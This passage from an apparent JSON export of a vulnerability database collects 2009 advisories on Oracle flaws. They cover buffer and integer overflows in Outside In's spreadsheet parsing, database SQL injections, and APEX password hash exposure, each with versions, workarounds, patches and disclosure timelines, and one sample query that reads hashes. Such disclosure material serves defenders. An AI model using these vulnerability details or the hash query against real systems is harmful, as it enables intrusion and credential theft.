For more information,\r\nvisit the vendors' sites at the URLs provided below.\r\n\r\nhttp://www.oracle.com/technology/products/content-management/oit/oit_all.html\r\n\r\nhttp://www.good.com/corp/index.php\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a buffer overflow vulnerability in Oracle Corp.'s\r\nOutside In Technology, as included in various vendors' software\r\ndistributions, allows attacker to execute arbitrary code.\r\n\r\nThis vulnerability exists due to the lack of bounds checking when\r\nprocessing certain records within a Microsoft Excel spreadsheet. Upon\r\nentering the vulnerable function, data is copied from a heap buffer\r\ninto a stack buffer without ensuring that the data will fit. By\r\ncrafting an Excel spreadsheet file properly, it is possible to write\r\nbeyond the bounds of the stack buffer. The resulting stack corruption\r\nleads to arbitrary code execution.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability allows attackers to execute arbitrary\r\ncode. In order to exploit this vulnerability, the attacker must somehow\r\nsupply a malformed document to an application that will process the\r\ndocument with Outside In Technology. Likewise, the privileges gained\r\nwill also depend on the software using the library.\r\n\r\nIn the case of Good Mobile Messaging Server, an attacker can send an\r\nelectronic mail message with an Excel spreadsheet attachment to a user.\r\nWhen the user chooses to view the spreadsheet, the vulnerable condition\r\nwill be triggered. Upon successful exploitation, the attacker will gain\r\nthe privileges of the "GoodAdmin" user. This is a special user account\r\nwhich, in some configurations, may be a member of the "Administrator"\r\ngroup. Regardless of the user's "Administrator" status, the user will\r\nalways have full privileges to "Read" and "Send As" all users on the\r\nMicrosoft Exchange server. 
This could allow an attacker to conduct\r\nfurther social engineering attacks.\r\n\r\nOther software packages using Outside In were not investigated.\r\n\r\nIt is interesting to note that this vulnerability was fixed some time\r\nbetween the release of version 8.1.5 and version 8.1.9. No public\r\nrecord exists documenting the existence of this vulnerability.\r\n\r\nIV. DETECTION\r\n\r\niDefense confirmed the existence of this vulnerability using the following\r\nversions of Outside In on Windows Server 2003.\r\n\r\n 8.1.5.4282\r\n\r\nAdditionally the following versions of Good Mobile Messaging Server for\r\nExchange ship with vulnerable versions of vsxl5.dll.\r\n\r\n 4.9.3.41\r\n\r\nAll prior versions of Outside In, including versions for operating\r\nsystems other than Windows, are assumed to be vulnerable. Additionally,\r\nall software that includes or uses affected versions of Outside In is\r\nassumed to be vulnerable. Earlier versions, including those branded\r\nwith other names, are vulnerable as well.\r\n\r\niDefense confirmed that the following versions are not affected:\r\n\r\n 8.1.9.4417 (shipped with GMMS 5.0.4.28 and GMMS 6.0.0.106)\r\n 8.2.2.4866\r\n 8.3.0.5129\r\n\r\nV. WORKAROUND\r\n\r\nIn order to prevent exploitation of this vulnerability, iDefense\r\nrecommends using file system access control lists (ACLs) to prevent\r\nreading the affected module.\r\n\r\nFor Good Mobile Messaging Server, Good Software recommends deleting the\r\nGdFileConv.exe file and restarting the Messaging Server.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nOracle has released a patch which addresses this issue. For more\r\ninformation, consult their advisory at the following URL:\r\n\r\nhttp://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\n\r\nGood Technology has released a patch which addresses this issue. For\r\nmore information, consult their advisory at the following URL:\r\n\r\nhttp://www.good.com/faq/18431.html\r\n\r\nVII. 
CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2009-1009 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n01/30/2009 - GoodLink contact identified\r\n01/30/2009 - Security contact research begins\r\n02/05/2009 - Oracle contact identified\r\n02/09/2009 - Initial Oracle Reply\r\n02/09/2009 - Initial Vendor Notification\r\n02/10/2009 - Initial GoodLink Reply\r\n02/11/2009 - Oracle validation\r\n02/16/2009 - GoodLink customer alert sent\r\n02/16/2009 - GoodLink validation\r\n02/19/2009 - Oracle requests PoC\r\n02/19/2009 - PoC sent to Oracle\r\n02/25/2009 - GoodLink status update\r\n02/27/2009 - Oracle status update\r\n03/06/2009 - GoodLink status update\r\n04/14/2009 - Oracle patch released\r\n05/13/2009 - CVE Correlation requested from Oracle\r\n05/14/2009 - Coordinated Public Disclosure\r\n05/14/2009 - GoodLink ready for disclosure coordinated with iDefense\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was discovered by Joshua J. Drake, iDefense Labs.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2009 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use
Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niD8DBQFKDc5Sbjs6HoxIfBkRAmuQAKCIbWEf7snT1hbZim+Tcug/6P0vZACdFPij\r\nTvLxJSUqv/vKW37aj1rG7g8=\r\n=Rbbs\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2009-05-18T00:00:00", "published": "2009-05-18T00:00:00", "id": "SECURITYVULNS:DOC:21836", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21836", "title": "iDefense Security Advisory 05.14.09: Multiple Vendor Outside In Spreadsheet Buffer Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\niDefense Security Advisory 05.14.09\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nMay 14, 2009\r\n\r\nI. BACKGROUND\r\n\r\nOracle Corp.'s Outside In Technology is a document conversion engine\r\nsupporting a large number of binary file formats. Prior to Oracle's\r\nacquisition, the software was maintained by Stellent Inc. The software\r\nappears to have originated from "QuickView" for Windows 98, but later\r\nspun off. It is used by various software packages, one of which is\r\nMotorola Inc.'s Good Mobile Messaging Server. For more information,\r\nvisit the vendors' sites at the URLs provided below.\r\n\r\nhttp://www.oracle.com/technology/products/content-management/oit/oit_all.html\r\n\r\nhttp://www.good.com/corp/index.php\r\n\r\nII. 
DESCRIPTION\r\n\r\nRemote exploitation of multiple buffer overflow vulnerabilities in\r\nOracle Corp.'s Outside In Technology, as included in various vendors'\r\nsoftware distributions, allow attackers to execute arbitrary code.\r\n\r\nTwo vulnerabilities exist due to a lack of bounds checking when\r\nprocessing specially crafted Microsoft Excel spreadsheet files. The two\r\nissues exist in two distinct functions. The two vulnerabilities are\r\nnearly identical, with the differentiating factor being the value of a\r\nflag bit within a record of the file. If the bit is set, the code path\r\nto the first vulnerable function is taken. Otherwise, the code path to\r\nthe second vulnerable function is taken.\r\n\r\nThe cause of the vulnerability is the same in each case. An array of\r\nstructures, stored on the stack, is manipulated in a loop without\r\nvalidating the bounds of the array. By crafting a file containing a\r\nproperly malformed record, it is possible to write outside the bounds\r\nof this array. The resulting stack corruption can lead to arbitrary\r\ncode execution.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of these vulnerabilities allows attackers to execute\r\narbitrary code. In order to exploit these vulnerabilities, the attacker\r\nmust somehow supply a malformed document to an application that will\r\nprocess the document with Outside In Technology. Likewise, the\r\nprivileges gained will also depend on the software using the library.\r\n\r\nIn the case of Good Mobile Messaging Server, an attacker can send an\r\nelectronic mail message with an Excel spreadsheet attachment to a user.\r\nWhen the user chooses to view the spreadsheet, the vulnerable condition\r\nwill be triggered. Upon successful exploitation, the attacker will gain\r\nthe privileges of the "GoodAdmin" user. This is a special user account\r\nwhich, in some configurations, may be a member of the "Administrator"\r\ngroup. 
Regardless of the user's "Administrator" status, the user will\r\nalways have full privileges to "Read" and "Send As" all users on the\r\nMicrosoft Exchange server. This could allow an attacker to conduct\r\nfurther social engineering attacks.\r\n\r\nOther software packages using Outside In were not investigated.\r\n\r\nIV. DETECTION\r\n\r\niDefense confirmed the existence of these vulnerabilities using the\r\nfollowing versions of Outside In on Windows Server 2003 SP2.\r\n\r\n 8.1.5.4282\r\n 8.1.9.4417\r\n 8.2.2.4866\r\n 8.3.0.5129\r\n\r\nAdditionally the following versions of Good Mobile Messaging Server for\r\nExchange ship with vulnerable versions of vsxl5.dll.\r\n\r\n 4.9.3.41\r\n 5.0.4.28\r\n 6.0.0.106\r\n\r\nAll versions of Outside In, including versions for operating systems\r\nother than Windows, are assumed to be vulnerable. Additionally, all\r\nsoftware that includes or uses Outside In is assumed to be vulnerable.\r\nEarlier versions, including those branded with other names, are\r\nvulnerable as well.\r\n\r\nV. WORKAROUND\r\n\r\nIn order to prevent exploitation of this vulnerability, iDefense\r\nrecommends using file system access control lists (ACLs) to prevent\r\nreading the affected module.\r\n\r\nFor Good Mobile Messaging Server, Good Software recommends deleting the\r\nGdFileConv.exe file and restarting the Messaging Server.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nOracle has released a patch which addresses this issue. For more\r\ninformation, consult their advisory at the following URL:\r\n\r\nhttp://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\n\r\nGood Technology has released a patch which addresses this issue. For\r\nmore information, consult their advisory at the following URL:\r\n\r\nhttp://www.good.com/faq/18431.html\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2009-1009 to this issue. 
This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n01/30/2009 - GoodLink contact identified\r\n01/30/2009 - Security contact research begins\r\n02/05/2009 - Oracle contact identified\r\n02/09/2009 - Initial Oracle Reply\r\n02/09/2009 - Initial Vendor Notification\r\n02/10/2009 - Initial GoodLink Reply\r\n02/11/2009 - Oracle validation\r\n02/16/2009 - GoodLink customer alert sent\r\n02/16/2009 - GoodLink validation\r\n02/19/2009 - Oracle requests PoC\r\n02/19/2009 - PoC sent to Oracle\r\n02/25/2009 - GoodLink status update\r\n02/27/2009 - Oracle status update\r\n03/06/2009 - GoodLink status update\r\n04/14/2009 - Oracle patch released\r\n05/13/2009 - CVE Correlation requested from Oracle\r\n05/14/2009 - Coordinated Public Disclosure\r\n05/14/2009 - GoodLink ready for disclosure coordinated with iDefense\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was discovered by Joshua J. Drake, iDefense Labs.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2009 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. 
Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niD8DBQFKDc+jbjs6HoxIfBkRAvY9AJ9WjWSDZK8tmiaAo5tLkrRZrDDscwCeJ8qk\r\n0aG0K5EpST6rBQF7jgOIhC8=\r\n=94Xc\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2009-05-18T00:00:00", "published": "2009-05-18T00:00:00", "id": "SECURITYVULNS:DOC:21837", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21837", "title": "iDefense Security Advisory 05.14.09: Multiple Vendor Outside In Multiple Spreadsheet Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nTeam SHATTER Security Advisory\r\n\r\nBuffer Overflow in Resource Manager of Oracle Database - Plan name parameter\r\n\r\nAugust 27, 2009\r\n\r\nRisk Level:\r\nMedium\r\n\r\nAffected versions:\r\nOracle Database Server version 9iR1 and 9iR2\r\n\r\nRemote exploitable:\r\nYes (Authentication to Database Server is needed)\r\n\r\nCredits:\r\nThis vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security\r\nInc.\r\n\r\nDetails:\r\nThe plan name parameter used in ALTER SYSTEM SET RESOURCE_MANAGER_PLAN statement and in\r\nSYS.DBMS_RESOURCE_MANAGER.SWITCH_PLAN procedure is vulnerable to buffer overflow attacks. When\r\npassing an overly long plan name string a buffer can be overflowed.\r\n\r\nImpact:\r\nTo exploit this vulnerability it is required to have ALTER SYSTEM privilege. Exploitation of this\r\nvulnerability allows an attacker to execute arbitrary code. 
It can also be exploited to cause DoS\r\n(Denial of service) killing the Oracle server process.\r\n\r\nVendor Status:\r\nVendor was contacted and a patch was released.\r\n\r\nWorkaround:\r\nRestrict ALTER SYSTEM privilege.\r\n\r\nFix:\r\nApply Oracle Critical Patch Update July 2009 available at Oracle Metalink.\r\n\r\nCVE:\r\nCVE-2009-0979\r\n\r\nLinks:\r\nhttp://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\nhttp://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2009.html\r\n\r\nTimeline:\r\nVendor Notification - 8/15/2007\r\nFix - 07/14/2009\r\nPublic Disclosure - 08/07/2009\r\n\r\nApplication Security, Inc's database security solutions have helped over 1,600 organizations secure\r\ntheir databases from all internal and external threats while also ensuring that those organizations\r\nmeet or exceed regulatory compliance and audit requirements.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate at the time of publishing\r\nbased on currently available information. Use of the information constitutes acceptance for use in an\r\nAS IS condition. There are no warranties with regard to this information. 
Neither the author nor the\r\npublisher accepts any liability for any direct, indirect, or consequential loss or damage arising\r\nfrom use of, or reliance on, this information.", "modified": "2009-08-28T00:00:00", "published": "2009-08-28T00:00:00", "id": "SECURITYVULNS:DOC:22390", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22390", "title": "Team SHATTER Security Advisory: Buffer Overflow in Resource Manager of Oracle Database - Plan name parameter", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "Name SQL Injection in package DBMS_AQIN [CVE-2009-0992]\r\nSystems Affected Oracle 10.1.0.5 - 11.1.0.7\r\nSeverity High Risk\r\nCategory SQL Injection\r\nVendor URL http://www.oracle.com/\r\nAuthor Alexander Kornbrust (ak at red-database-security.com)\r\nCVE CVE-2009-0992\r\nAdvisory 14 April 2009 (V 1.00)\r\n\r\nDetails:\r\nThe package DBMS_AQIN contains a SQL injection vulnerability in the procedure DEQ_EXEJOB. \r\nAdditional information is available in the following advisory.\r\n\r\n\r\nAdvisory:\r\nhttp://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqin.html\r\n\r\n\r\nPatch Information:\r\nApply the patches for Oracle CPU April 2009.\r\n\r\n\r\nVerification:\r\nOur Oracle database scanner Repscan was updated with the information from the Oracle\r\nCPU April 2009 and can identify vulnerable databases. 
\r\nMore Information about Repscan can be found here:\r\nhttp://www.sentrigo.com/repscan\r\n\r\n\r\nHistory:\r\n14-apr-2009 Oracle published CPU April 2009 [CVE-]\r\n14-apr-2009 Advisory published\r\n\r\n\r\nAbout Red-Database-Security:\r\nRed-Database-Security is the leading company for Oracle security. Within the last \r\n6 years we reported several hundred vulnerabilities to Oracle.\r\n\r\n--\r\n(c) 2009 by Red-Database-Security GmbH\r\nhttp://www.red-database-security.com", "modified": "2009-04-16T00:00:00", "published": "2009-04-16T00:00:00", "id": "SECURITYVULNS:DOC:21666", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21666", "title": "SQL Injection in package DBMS_AQIN", "type": "securityvulns", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\niDefense Security Advisory 05.14.09\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nMay 14, 2009\r\n\r\nI. BACKGROUND\r\n\r\nOracle Corp.'s Outside In Technology is a document conversion engine\r\nsupporting a large number of binary file formats. Prior to Oracle's\r\nacquisition, the software was maintained by Stellent Inc. The software\r\nappears to have originated from "QuickView" for Windows 98, but later\r\nspun off. It is used by various software packages, one of which is\r\nMotorola Inc.'s Good Mobile Messaging Server. For more information,\r\nvisit the vendors' sites at the URLs provided below.\r\n\r\nhttp://www.oracle.com/technology/products/content-management/oit/oit_all.html\r\n\r\nhttp://www.good.com/corp/index.php\r\n\r\nII. 
DESCRIPTION\r\n\r\nRemote exploitation of multiple integer overflow vulnerabilities in\r\nOracle Corp.'s Outside In Technology, as included in various vendors'\r\nsoftware distributions, allows attacker to execute arbitrary code.\r\n\r\nThese vulnerabilities exist in the handling of an optional data stream\r\nstored within various files. Both issues are integer overflows, and are\r\nwithin the same function.\r\n\r\nWithin the vulnerable function, an integer value is read from the\r\nMicrosoft Office file. This value is later used in several arithmetic\r\ninteger calculations. Since no validation is performed, integer\r\noverflows can occur. The result is the allocation of a buffer that is\r\ntoo small to hold the data that is subsequently read from the file. A\r\nheap buffer overflow occurs, leading to an exploitable condition.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of these vulnerabilities allows attackers to execute\r\narbitrary code. In order to exploit these vulnerabilities, the attacker\r\nmust somehow supply a malformed document to an application that will\r\nprocess the document with Outside In Technology. Likewise, the\r\nprivileges gained will also depend on the software using the library.\r\n\r\nIn the case of Good Mobile Messaging Server, an attacker can send an\r\nelectronic mail message with a specially crafted Office document\r\nattachment to a user. When the user chooses to view the document, the\r\nvulnerable condition will be triggered. Upon successful exploitation,\r\nthe attacker will gain the privileges of the "GoodAdmin" user. This is\r\na special user account which, in some configurations, may be a member\r\nof the "Administrator" group. Regardless of the user's "Administrator"\r\nstatus, the user will always have full privileges to "Read" and "Send\r\nAs" all users on the Microsoft Exchange server. 
This could allow an\r\nattacker to conduct further social engineering attacks.\r\n\r\nOther software packages using Outside In were not investigated.\r\n\r\nIV. DETECTION\r\n\r\niDefense confirmed the existence of these vulnerabilities using the\r\nfollow versions of Outside In on Windows Server 2003. Multiple modules\r\nwere confirmed to contain the vulnerable code; vsmpp, vspp97, vsvisio,\r\nvsw6, vsw97, vsxl5. Other modules may also be affected.\r\n\r\n 8.1.5.4282\r\n 8.1.9.4417\r\n 8.2.2.4866\r\n 8.3.0.5129\r\n\r\nAdditionally the following versions of Good Mobile Messaging Server for\r\nExchange ship with vulnerable versions of the affected modules.\r\n\r\n 4.9.3.41\r\n 5.0.4.28\r\n 6.0.0.106\r\n\r\nAll versions of Outside In, including versions for operating systems\r\nother than Windows, are assumed to be vulnerable. Additionally, all\r\nsoftware that includes or uses Outside In is assumed to be vulnerable.\r\nEarlier versions, including those branded with other names, are\r\nvulnerable as well.\r\n\r\nV. WORKAROUND\r\n\r\nIn order to prevent exploitation of this vulnerability, iDefense\r\nrecommends using file system access control lists (ACLs) to prevent\r\nreading the affected modules.\r\n\r\nFor Good Mobile Messaging Server, Good Software recommends deleting the\r\nGdFileConv.exe file and restarting the Messaging Server.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nOracle has released a patch which addresses this issue. For more\r\ninformation, consult their advisory at the following URL:\r\n\r\nhttp://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html\r\n\r\nGood Technology has released a patch which addresses this issue. For\r\nmore information, consult their advisory at the following URL:\r\n\r\nhttp://www.good.com/faq/18431.html\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2009-1011 to this issue. 
This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n01/30/2009 - GoodLink contact identified\r\n01/30/2009 - Security contact research begins\r\n02/05/2009 - Oracle contact identified\r\n02/09/2009 - Initial Oracle Reply\r\n02/09/2009 - Initial Vendor Notification\r\n02/10/2009 - Initial GoodLink Reply\r\n02/11/2009 - Oracle validation\r\n02/16/2009 - GoodLink customer alert sent\r\n02/16/2009 - GoodLink validation\r\n02/19/2009 - Oracle requests PoC\r\n02/19/2009 - PoC sent to Oracle\r\n02/25/2009 - GoodLink status update\r\n02/27/2009 - Oracle status update\r\n03/06/2009 - GoodLink status update\r\n04/14/2009 - Oracle patch released\r\n05/13/2009 - CVE Corelation requested from Oracle\r\n05/14/2009 - Coordinated Public Disclosure\r\n05/14/2009 - GoodLink ready for disclosure coordinated with iDefense\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was discovered by Joshua J. Drake, iDefense Labs.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2009 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. 
Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.\r\n", "modified": "2009-05-18T00:00:00", "published": "2009-05-18T00:00:00", "id": "SECURITYVULNS:DOC:21834", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21834", "title": "iDefense Security Advisory 05.14.09: Multiple Vendor Outside In Multiple Integer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "Name SQL Injection in package DBMS_AQADM_SYS [CVE-2009-0977]\r\nSystems Affected Oracle 9.2.0.8 - 10.2.0.3\r\nSeverity Medium Risk\r\nCategory SQL Injection\r\nVendor URL http://www.oracle.com/\r\nAuthor Franz Hüll (fh at red-database-security.com)\r\nCVE CVE-2009-0977\r\nAdvisory 14 April 2009 (V 1.00)\r\n\r\n\r\nDetails:\r\nThe package DBMS_AQADM_SYS contains a SQL injection vulnerability in the procedure\r\nGRANT_TYPE_ACCESS.\r\n\r\nAdditional information is available in the following advisory.\r\n\r\nAdvisory:\r\nhttp://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aqadm_sys.html\r\n\r\n\r\nPatch Information:\r\nApply the patches for Oracle CPU April 2009.\r\n\r\n\r\nVerification:\r\nOur Oracle database scanner Repscan was updated with the information from the Oracle\r\nCPU April 2009 and can identify vulnerable databases. 
\r\nMore Information about Repscan can be found here:\r\nhttp://www.sentrigo.com/repscan\r\n\r\n\r\nHistory:\r\n14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0977]\r\n14-apr-2009 Advisory published\r\n\r\n\r\nAbout Red-Database-Security:\r\nRed-Database-Security is the leading company for Oracle security. Within the last \r\n6 years we reported several hundred vulnerabilities to Oracle.\r\n\r\n\r\n--\r\n(c) 2009 by Red-Database-Security GmbH\r\nhttp://www.red-database-security.com", "modified": "2009-04-16T00:00:00", "published": "2009-04-16T00:00:00", "id": "SECURITYVULNS:DOC:21664", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21664", "title": "SQL Injection in package DBMS_AQADM_SYS", "type": "securityvulns", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "description": "Many security standards require the tracking of users' password history to \r\nprevent password re-use. In Oracle 11g (11.1.0.6), if a security \r\nadministrator has enabled 11g passwords exclusively then tracking password \r\nhistory is broken. This can affect compliance. This was addressed by Oracle \r\nin their April 2009 Critical Patch Update and maps to the currently \r\nunspecified vulnerability at \r\nhttp://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0988\r\nCheers,\r\nDavid Litchfield\r\nNGSSoftware Ltd\r\nhttp://www.ngssoftware.com/\r\n\r\n--\r\nE-MAIL DISCLAIMER\r\n\r\nThe information contained in this email and any subsequent\r\ncorrespondence is private, is solely for the intended recipient(s) and\r\nmay contain confidential or privileged information. For those other than\r\nthe intended recipient(s), any disclosure, copying, distribution, or any\r\nother action taken, or omitted to be taken, in reliance on such\r\ninformation is prohibited and may be unlawful. 
If you are not the\r\nintended recipient and have received this message in error, please\r\ninform the sender and delete this mail and any attachments.\r\n\r\nThe views expressed in this email do not necessarily reflect NGS policy.\r\nNGS accepts no liability or responsibility for any onward transmission\r\nor use of emails and attachments having left the NGS domain.\r\n\r\nNGS and NGSSoftware are trading names of Next Generation Security\r\nSoftware Ltd. Registered office address: Manchester Technology Centre,\r\nOxford Road, Manchester, M1 7EF with Company Number 04225835 and\r\nVAT Number 783096402", "modified": "2009-08-26T00:00:00", "published": "2009-08-26T00:00:00", "id": "SECURITYVULNS:DOC:22384", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22384", "title": "Oracle 11g (11.1.0.6) Password Policy and Compliance", "type": "securityvulns", "cvss": {"score": 2.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "Name Unprivileged DB users can see APEX password hashes\r\nSystems Affected APEX 3.0 (optional component of 11.1.0.7 installation)\r\nSeverity High Risk\r\nCategory Password Disclosure\r\nVendor URL http://www.oracle.com/\r\nAuthor Alexander Kornbrust (ak at red-database-security.com)\r\nCVE CVE-2009-0981\r\nAdvisory 14 April 2009 (V 1.00)\r\n\r\n\r\nDetails:\r\nUnprivileged database users can see APEX password hashes in FLOWS_030000.WWV_FLOW_USER.\r\n\r\nSQL> select user_name,web_password2 from FLOWS_030000.WWV_FLOW_USERS\r\n\r\nUSER_NAME WEB_PASSWORD2\r\n----------------------------------------------------------------------\r\nYURI 141FA790354FB6C72802FDEA86353F31\r\n\r\nThis password hash can be checked using a tool like Repscan.\r\n\r\n\r\nAdditional information is available in the following advisory.\r\n\r\n\r\nAdvisory:\r\nhttp://www.red-database-security.com/advisory/apex_password_hashes.html\r\n\r\n\r\nPatch 
Information:\r\nUpgrade to Oracle APEX 3.2.\r\n\r\n\r\nVerification:\r\nOur Oracle database scanner Repscan was updated with the information from the Oracle\r\nCPU April 2009 and can identify vulnerable databases. \r\nMore Information about Repscan can be found here:\r\nhttp://www.sentrigo.com/repscan\r\n\r\n\r\nHistory:\r\n13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]\r\n14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]\r\n14-apr-2009 Advisory published\r\n\r\n\r\nAbout Red-Database-Security:\r\nRed-Database-Security is the leading company for Oracle security. Within the last \r\n6 years we reported several hundred vulnerabilities to Oracle.\r\n\r\n--\r\n(c) 2009 by Red-Database-Security GmbH\r\nhttp://www.red-database-security.com", "modified": "2009-04-16T00:00:00", "published": "2009-04-16T00:00:00", "id": "SECURITYVULNS:DOC:21665", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21665", "title": "Unprivileged DB users can see APEX password hashes", "type": "securityvulns", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\niDefense Security Advisory 05.14.09\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nMay 14, 2009\r\n\r\nI. BACKGROUND\r\n\r\nOracle Corp.'s Outside In Technology is a document conversion engine\r\nsupporting a large number of binary file formats. Prior to Oracle's\r\nacquisition, the software was maintained by Stellent Inc. The software\r\nappears to have originated from "QuickView" for Windows 98, but later\r\nspun 